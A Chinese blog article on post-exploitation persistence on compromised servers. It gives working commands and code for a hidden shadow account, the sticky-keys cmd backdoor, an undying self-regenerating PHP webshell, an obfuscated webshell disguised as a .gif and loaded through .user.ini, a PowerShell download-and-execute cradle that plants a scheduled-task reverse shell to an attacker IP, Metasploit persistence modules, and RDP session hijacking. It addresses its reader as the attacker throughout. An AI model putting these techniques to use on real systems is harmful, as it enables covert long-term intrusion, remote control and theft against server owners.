后渗透之维护权限

2019-08-12 14:25:26 admin

本文来源于微信公众号: 洛米唯熊


0x00:简介


何为“后渗透”?就是获取到受害者服务器的权限后,再继续对受害者服务器进行长期攻击或者信息获取的一种持续性手段。常见的手段有,后门、影子账户、会话劫持等等。

0x01:实验


一、影子账户


原理:创建一个跟普通用户一样的用户,但是只能在注册表中才能查看到的用户。

net user luomiweixiong$ 123456 /addnet user

需要改动一下注册表,详细可以百度一下


二、shift后门


原理:将按5下shift时调用的“粘滞键”替换为“CMD”

将 C:WINDOWSsystem32dllcachesethc.exe删除,这个文件夹中放着缓存,如果不 删除就会自动变回去

找到C:WINDOWSsystem32cmd.exe 
将其复制并将名称更改为 sethc.exe,放回文件夹中

这次按5次shift键就可以打开cmd了

三、反弹加入自启(鸡肋)


1、NC反弹

2、Bash反弹

3、perl反弹

4、Python反弹

5、PHP反弹

6、等等


将反弹的脚本写入到启动项里,当受害者启动服务器时,自动反弹shell。弊端就是要一直监听,还要有公网的IP。


四、隐藏后门文件


1、将木马文件属性改为“隐藏”



2、将木马名字进行伪装处理,伪装成系统文件或者报错文件。修改时间跟系统文件时间类似。


3、利用循环不死马(举栗子)


<?phpset_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while(1){file_put_contents('phpinf0.php','<?php $a=array($_REQUEST["kk"]=>"3");$b=array_keys($a)[0];eval($b);?>');sleep(8);}?>

说明:此脚本会每8秒不断的向服务器生成一个“phpinf0.php”的一句话木马.

五、利用.user.ini文件自动包含木马文件

在“.user.ini”文件写入
auto_prepend_file=luomiweixiong.gif

在“luomiweixiong.gif”文件写入一句话木马

<!–?php $a = “a”.”s”.”s”.”e”.”r”.”t”;$a($_POST[“kk”]); ?–>

利用成功前提下必须有以下三个文件,

1、PHP的正常文件
2、修改后.user.ini文件
3、luomiweixiong.gif木马




说明:在限制了PHP文件上传的条件下,上传ini文件,再进行文件包含拿shell.

六、Powershell权限维持

参考此PowerShell脚本
https://github.com/re4lity/Schtasks-Backdoor

利用代码:
powershell.exe-exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.124.25/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor-method nccat -ip 192.168.124.14 -port 666 -time 2"


说明:

1、192.168.124.25为受害者IP,前提是要把PowerShell脚本放到受害者服务器能访问到的根路径。

2、192.168.124.14为接收反弹回来的IP,可用NC监听反弹回来的shell

七、metasploit权限维持

1、Persistence模块

前提是利用MSF获取到了对方的会话

run persistence -U -i 12 -p 6666 -r 192.168.124.14


说明

-i  目标自动回连时间
-p  设置目标反向连接的端口
-r  设置目标反向连接的ip地址
-U  设置目标自启动

加入自启动后,就算受害者机器再次启动也能弹回shell

2、metsvc 模块
前提是利用MSF获取到了对方的会话

run metsvc -A

说明:

-A 自动启动一个匹配的 multi/handler 以连接到该服务

该模块是在受害者服务器开启了一个“Meterpreter”服务

下次攻击者可以利用metsvc_bind_tcp监听模块就可以再次获取到shell
监听端口为31337

八、会话劫持

说明:RDP会话劫持是在不知道另一用户密码的条件下进行切换用户登录

query usersc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"net start sesshijack


0x02:题外话


以上这些只是思路。未必能成。


维护权限还有很多种方法,我这里只是举几个栗子

服务热线

17884544032

公司地址

安徽省合肥市蜀山区鑫鹏大厦

作息时间

周一至周五 9:00-18:00